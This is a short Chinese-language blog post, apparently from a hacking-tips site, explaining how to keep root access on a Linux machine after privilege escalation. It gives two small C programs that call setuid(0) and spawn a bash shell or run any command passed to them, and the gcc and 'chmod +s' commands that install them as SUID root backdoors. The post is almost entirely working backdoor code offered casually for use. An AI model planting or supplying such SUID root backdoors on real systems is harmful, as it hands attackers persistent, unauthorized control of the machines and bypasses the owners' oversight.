Linux 获取 ROOT 权限后的维持小技巧

温馨提示:
本文最后更新于2024-06-09 08:00:10
某些文章具有时效性,若有错误或已失效,请在下方留言或联系Apibug咨询更新价格。

一个小技巧,做个笔记吧

当我们渗透的时候,从低权用户拿到 ROOT 权限了,一旦关闭了 Terminal 窗口 ROOT 权限就没了。为了解决这个问题,我们可以利用 Linux 的 SUID 技巧(人话就是S权限的二进制文件……)

代码:

#include <stdio.h>
int main()
{
    setuid(0);
    system("/bin/bash");
    return 0;
}

或者

#include <stdio.h>
int main(int argc,char* argv[])
{
    setuid(0);
    system(argv[1]);
    return 0;
}

拿到 ROOT 权限之后将上面的代码编译成执行程序

gcc -o rt code.c

然后赋予 S 权限(S权限自己百度)

chmod +s rt

然后愉快的在 ROOT 和非 ROOT 环境来回切换吧~

哎,就是玩儿~

本站代码教程仅供学习交流使用请勿商业运营,严禁二次倒卖,否则ban账号处理!
© 版权声明
THE END
喜欢就支持一下吧
点赞10赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容